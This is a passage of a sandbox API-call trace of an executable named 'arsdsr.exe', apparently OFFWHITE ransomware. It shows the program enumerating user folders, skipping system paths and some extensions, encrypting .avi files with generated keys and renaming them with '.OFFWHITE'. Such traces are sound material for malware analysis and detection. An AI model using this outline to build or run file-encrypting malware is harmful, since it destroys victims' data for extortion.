ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0135.947] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0135.947] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1 [0135.947] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1 [0135.947] lstrcmpiW (lpString1="Start Menu", lpString2="...") returned 1 [0135.947] lstrcmpiW (lpString1="Start Menu", lpString2="windows") returned -1 [0135.947] lstrcmpiW (lpString1="Start Menu", lpString2="$recycle.bin") returned 1 [0135.947] lstrcmpiW (lpString1="Start Menu", lpString2="rsa") returned 1 [0135.948] lstrcmpiW (lpString1="Start Menu", lpString2="ntuser.dat") returned 1 [0135.948] lstrcmpiW (lpString1="Start Menu", lpString2="programdata") returned 1 [0135.948] lstrcmpiW (lpString1="Start Menu", lpString2="appdata") returned 1 [0135.948] lstrcmpiW (lpString1="Start Menu", lpString2="program files") returned 1 [0135.948] lstrcmpiW (lpString1="Start Menu", lpString2="program files (x86)") returned 1 [0135.948] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.948] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0135.948] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0135.948] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\" [0135.948] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0135.948] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0135.948] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="...") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="windows") returned -1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="$recycle.bin") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="rsa") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="ntuser.dat") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="programdata") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="appdata") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="program files") returned 1 [0135.948] lstrcmpiW (lpString1="Templates", lpString2="program files (x86)") returned 1 [0135.948] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0135.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0135.949] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\" [0135.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0135.949] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0135.949] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbc8a580, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc8a580, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Videos", cAlternateFileName="")) returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="...") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="$recycle.bin") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="rsa") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="programdata") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="appdata") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="program files") returned 1 [0135.949] lstrcmpiW (lpString1="Videos", lpString2="program files (x86)") returned 1 [0135.949] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0135.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0135.949] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0135.949] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0135.949] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbc8a580, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc8a580, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName=".", cAlternateFileName="")) returned 0x544610 [0135.951] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.951] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbc8a580, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbc8a580, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="..", cAlternateFileName="")) returned 1 [0135.951] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.951] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.951] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5cebd0, ftCreationTime.dwHighDateTime=0x1d5e150, ftLastAccessTime.dwLowDateTime=0x433c39c0, ftLastAccessTime.dwHighDateTime=0x1d5e498, ftLastWriteTime.dwLowDateTime=0x433c39c0, ftLastWriteTime.dwHighDateTime=0x1d5e498, nFileSizeHigh=0x0, nFileSizeLow=0xb871, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="a7HknCSYOB7s_zZFQES.avi", cAlternateFileName="A7HKNC~1.AVI")) returned 1 [0135.951] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2=".") returned 1 [0135.951] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="..") returned 1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="...") returned 1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="windows") returned -1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="$recycle.bin") returned 1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="rsa") returned -1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="ntuser.dat") returned -1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="programdata") returned -1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="appdata") returned -1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="program files") returned -1 [0135.952] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="program files (x86)") returned -1 [0135.952] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0135.952] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="a7HknCSYOB7s_zZFQES.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi" [0135.952] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.952] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.952] PathFindExtensionW (pszPath="a7HknCSYOB7s_zZFQES.avi") returned=".avi" [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0135.952] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0135.953] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0135.953] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0135.953] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0135.953] lstrcmpiW (lpString1="a7HknCSYOB7s_zZFQES.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.953] GetProcessHeap () returned 0x500000 [0135.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521fe0 [0135.953] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\a7hkncsyob7s_zzfqes.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.953] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=47217) returned 1 [0135.953] GetProcessHeap () returned 0x500000 [0135.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0135.953] GetProcessHeap () returned 0x500000 [0135.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0135.953] GetProcessHeap () returned 0x500000 [0135.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0135.953] GetProcessHeap () returned 0x500000 [0135.953] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0135.953] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.953] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.953] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0135.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.954] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0135.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.954] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.954] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.954] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.954] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.954] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb871, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.954] SetLastError (dwErrCode=0x0) [0135.954] WriteFile (in: hFile=0xb0, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.956] GetLastError () returned 0x0 [0135.956] GetLastError () returned 0x0 [0135.956] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xb971, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.956] WriteFile (in: hFile=0xb0, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0135.957] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xba71, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.957] WriteFile (in: hFile=0xb0, lpBuffer=0x521fe0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x521fe0*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0135.957] GetProcessHeap () returned 0x500000 [0135.957] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb871) returned 0x55a7b8 [0135.957] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.957] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0xb871, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0xb871, lpOverlapped=0x0) returned 1 [0135.963] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.963] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0xb871, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0xb871, lpOverlapped=0x0) returned 1 [0135.963] GetProcessHeap () returned 0x500000 [0135.963] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.963] CloseHandle (hObject=0xb0) returned 1 [0135.968] GetProcessHeap () returned 0x500000 [0135.968] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0135.968] GetProcessHeap () returned 0x500000 [0135.968] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0135.968] GetProcessHeap () returned 0x500000 [0135.968] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0135.968] GetProcessHeap () returned 0x500000 [0135.968] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0135.969] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi" [0135.969] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi.OFFWHITE" [0135.969] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\a7hkncsyob7s_zzfqes.avi"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\a7HknCSYOB7s_zZFQES.avi.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\a7hkncsyob7s_zzfqes.avi.offwhite")) returned 1 [0135.969] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e11fcd0, ftCreationTime.dwHighDateTime=0x1d5e377, ftLastAccessTime.dwLowDateTime=0xcb885c20, ftLastAccessTime.dwHighDateTime=0x1d5e275, ftLastWriteTime.dwLowDateTime=0xcb885c20, ftLastWriteTime.dwHighDateTime=0x1d5e275, nFileSizeHigh=0x0, nFileSizeLow=0x1874a, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="BbLdFAbs w.avi", cAlternateFileName="BBLDFA~1.AVI")) returned 1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2=".") returned 1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="..") returned 1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="...") returned 1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="windows") returned -1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="$recycle.bin") returned 1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="rsa") returned -1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="ntuser.dat") returned -1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="programdata") returned -1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="appdata") returned 1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="program files") returned -1 [0135.970] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="program files (x86)") returned -1 [0135.970] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0135.970] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="BbLdFAbs w.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi" [0135.970] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.970] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.970] PathFindExtensionW (pszPath="BbLdFAbs w.avi") returned=".avi" [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0135.970] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0135.971] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0135.971] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0135.971] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0135.971] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0135.971] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0135.971] lstrcmpiW (lpString1="BbLdFAbs w.avi", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.971] GetProcessHeap () returned 0x500000 [0135.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521ff0 [0135.971] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\BbLdFAbs w.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bbldfabs w.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0135.971] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=100170) returned 1 [0135.971] GetProcessHeap () returned 0x500000 [0135.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0135.971] GetProcessHeap () returned 0x500000 [0135.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0135.971] GetProcessHeap () returned 0x500000 [0135.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0135.971] GetProcessHeap () returned 0x500000 [0135.972] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0135.972] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.972] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.972] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0135.972] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.972] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.972] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0135.972] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 